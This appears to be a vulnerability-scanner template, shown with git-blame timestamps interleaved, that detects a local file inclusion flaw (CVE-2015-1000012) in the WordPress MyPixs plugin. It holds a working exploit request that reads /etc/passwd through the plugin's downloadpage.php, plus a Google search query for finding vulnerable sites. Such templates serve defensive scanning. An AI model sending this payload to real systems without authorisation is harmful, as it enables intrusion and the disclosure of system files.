2021-07-14 11:10:41 +00:00
|
|
|
id: CVE-2015-1000012
|
|
|
|
|
|
|
|
info:
|
2022-06-09 20:35:21 +00:00
|
|
|
name: WordPress MyPixs <=0.3 - Local File Inclusion
|
2021-07-14 11:10:41 +00:00
|
|
|
author: daffainfo
|
|
|
|
severity: high
|
2022-06-09 20:35:21 +00:00
|
|
|
description: WordPress MyPixs 0.3 and prior contains a local file inclusion vulnerability.
|
2021-08-18 11:37:49 +00:00
|
|
|
reference:
|
2021-07-14 13:56:20 +00:00
|
|
|
- https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985
|
|
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012
|
2022-05-17 09:18:12 +00:00
|
|
|
- http://www.vapidlabs.com/advisory.php?v=154
|
2022-06-09 20:35:21 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2015-1000012
|
2022-06-07 20:50:59 +00:00
|
|
|
- http://web.archive.org/web/20210518144916/https://www.securityfocus.com/bid/94495
|
2021-09-10 11:26:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 7.5
|
2021-09-10 11:26:40 +00:00
|
|
|
cve-id: CVE-2015-1000012
|
|
|
|
cwe-id: CWE-200
|
2022-07-11 17:26:24 +00:00
|
|
|
metadata:
|
|
|
|
google-query: inurl:"/wp-content/plugins/mypixs"
|
2021-09-28 10:42:51 +00:00
|
|
|
tags: cve,cve2015,wordpress,wp-plugin,lfi
|
2021-07-14 11:10:41 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: regex
|
|
|
|
regex:
|
2022-03-22 08:01:31 +00:00
|
|
|
- "root:.*:0:0:"
|
2021-07-14 11:10:41 +00:00
|
|
|
part: body
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2022-06-09 20:35:21 +00:00
|
|
|
|
|
|
|
# Enhanced by mp on 2022/06/06
|